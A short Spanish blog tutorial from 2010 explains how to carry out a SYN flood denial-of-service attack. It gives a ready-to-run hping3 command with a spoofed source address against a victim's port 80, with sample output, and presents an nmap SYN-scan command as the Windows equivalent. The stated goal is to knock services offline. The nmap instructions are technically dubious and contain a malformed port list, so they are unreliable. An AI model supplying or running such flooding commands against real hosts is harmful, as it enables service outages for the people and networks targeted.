22 de enero de 2010

Tutorial Syn flood -- Windows y Linux

Un SYN flood es un tipo de ataque "denegación de servicio" en el que un atacante envía una sucesión de peticiones SYN a su víctima.

No me voy a enrollar mucho a la hora de explicar esto así que os dejo unos link para que lo podéis leer y entender. Si todavía tienen dudas, mándenme un correo a monzisez@gmail.com
  1. Wikipedia
  2. Sui90
Una vez entendido el concepto SYN flood, sabremos que este ataque nos sirve para denegar cualquier servicio que se realize en un puerto; por ejemplo: Denegar el servicio telnet en el puerto 23, denegar el servicio http (nadie tendrá internet) en el puerto 80,....

¿Cómo hacer SYN flood en Linux?

Instalamos el programa hping:
  • sudo apt-get install hping3
Y escribimos:
  • sudo hping -i u2 -S -p Nº PUERTO -a IP INVENTADA IP VÍCTIMA
Que quedaría como:
  • sudo hping -i u2 -S -p 80 -a 192.168.1.99 192.168.1.1
  • Nos devuelve: HPING 192.168.1.1 (192.168.1.1): S set, 40 headers + 0 data bytes

    --- 192.168.1.1 hping statistic ---
    3520 packets transmitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms
¿Cómo hacer SYN flood en Windows?

Descargamos nmap.

En nmap, escribimos lo siguente:
  • nmap -sS -T 5 -M 500 -p [Aqui puertos abiertos separados por coma] IP VÍCTIMA
Que nos quedaría como:
  • nmap -sS -T 5 -M 500 -p [80. 8080] 192.168.1.1
Tutorial by Monzi_sez -- 22 de enero de 2010

1 comentario: